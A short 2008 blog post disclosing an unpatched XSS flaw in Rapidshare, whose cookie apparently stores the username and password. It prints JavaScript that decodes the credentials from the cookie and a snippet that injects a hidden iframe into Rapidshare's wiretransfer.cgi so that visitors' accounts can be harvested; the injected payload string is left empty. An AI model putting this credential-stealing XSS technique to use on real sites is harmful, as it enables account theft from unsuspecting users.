mardi 15 juillet 2008

Rapidshare XSS hack : an attack for get the account

As nktpro graciously told us, the latest of several XSS vulnerabilities affecting Rapidshare is still unpatched, one month after it had been reported to the site owners.
But what can you expect by people who stores both your username and password inside your cookie?
Yes, check it by yourself: a Rapidshare cookie is something like user=12345-%36%37%38%39%30.
In Javascript,
cookie = "username=" + login + "-" + pwd.replace(/./g, function(s) "%" + (s.charCodeAt(0).toString(16)))

Therefore, for a given cookie, access credentials are just
var [login, pwd] = cookie.replace(/.*=/,'').split("-"), pwd = unescape(pwd);

This means that if I embed the following code on this blog post, or even better on the FlashGot homepage, visited by thousands of

Rapidshare users, I own an insane lot of accounts in a blink:

var injection = ""
var iframe = document.body.appendChild(document.createElement("iframe"));
iframe.style.visibility = "hidden";
iframe.src = "http://rapidshare.com/cgi-bin/wiretransfer.cgi?extendaccount=12345%22" +
encodeURIComponent(injection);

But luckily, no Rapidshare user would ever visit those shady p0rn/w4r3z sites… ;)

Aucun commentaire: